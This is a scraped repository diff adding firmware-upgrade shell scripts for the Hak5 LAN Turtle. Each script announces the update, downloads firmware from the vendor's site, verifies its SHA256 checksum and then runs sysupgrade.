echo "sleep 10 && sysupgrade -n /tmp/upgrade.bin" | at now &> /dev/null
|
||||
sleep 8 && clear
|
||||
killall sshd
|
||||
} || {
|
||||
echo -e "SHA256 checksum missmatch. Please try again."
|
||||
}
|
|
@ -0,0 +1,22 @@
|
|||
function sha256sum() {
|
||||
python -sBc "import hashlib;print hashlib.sha256(open('$1','rb').read()).hexdigest()"
|
||||
}
|
||||
|
||||
echo -e "Update Available. Install will begin in 15 seconds...\n\n"
|
||||
echo -e "All local LAN Turtle data will be erased.\n\n"
|
||||
echo -e "Press CTRL+C to CANCEL\n\n"
|
||||
sleep 15
|
||||
echo -e "Downloading Upgrade file, please wait.\n\n"
|
||||
wget -q -O /tmp/upgrade.bin https://downloads.hak5.org/api/devices/lanturtle/firmwares/6.2
|
||||
echo -e "Upgrade file downloaded. Verifying file integrity.\n\n"
|
||||
[[ "$(sha256sum /tmp/upgrade.bin)" == "463771173c17b8aa3e6baac397d8d9c893d896b8f009b471dea0d66792b5afd1" ]] && {
|
||||
echo -e "DO NOT UNPLUG OR POWER DOWN THE LAN TURTLE\n\n"
|
||||
echo -e "Upgrade in progress. Please wait ~5 minutes.\n"
|
||||
echo -e "The LAN Turtle will reboot when the upgrade is complete.\n"
|
||||
echo -e "This SSH session will now close.\n"
|
||||
echo "sleep 10 && sysupgrade -n /tmp/upgrade.bin" | at now &> /dev/null
|
||||
sleep 8 && clear
|
||||
killall sshd
|
||||
} || {
|
||||
echo -e "SHA256 checksum missmatch. Please try again."
|
||||
}
|
|
@ -0,0 +1,22 @@
|
|||
function sha256sum() {
|
||||
python -sBc "import hashlib;print hashlib.sha256(open('$1','rb').read()).hexdigest()"
|
||||
}
|
||||
|
||||
echo -e "Update Available. Install will begin in 15 seconds...\n\n"
|
||||
echo -e "All local LAN Turtle data will be erased.\n\n"
|
||||
echo -e "Press CTRL+C to CANCEL\n\n"
|
||||
sleep 15
|
||||
echo -e "Downloading Upgrade file, please wait.\n\n"
|
||||
wget -q -O /tmp/upgrade.bin https://downloads.hak5.org/api/devices/lanturtle/firmwares/6
|
||||
echo -e "Upgrade file downloaded. Verifying file integrity.\n\n"
|
||||
[[ "$(sha256sum /tmp/upgrade.bin)" == "d7d333f747770944385b06521075f28126ded11adec5cabe14934cb6f4458820" ]] && {
|
||||
echo -e "DO NOT UNPLUG OR POWER DOWN THE LAN TURTLE\n\n"
|
||||
echo -e "Upgrade in progress. Please wait ~5 minutes.\n"
|
||||
echo -e "The LAN Turtle will reboot when the upgrade is complete.\n"
|
||||
echo -e "This SSH session will now close.\n"
|
||||
echo "sleep 10 && sysupgrade -n /tmp/upgrade.bin" | at now &> /dev/null
|
||||
sleep 8 && clear
|
||||
killall sshd
|
||||
} || {
|
||||
echo -e "SHA256 checksum missmatch. Please try again."
|
||||
}
|
|
@ -1 +1 @@
|
|||
5
|
||||
6.2
|
||||
|
|
Loading…
Reference in New Issue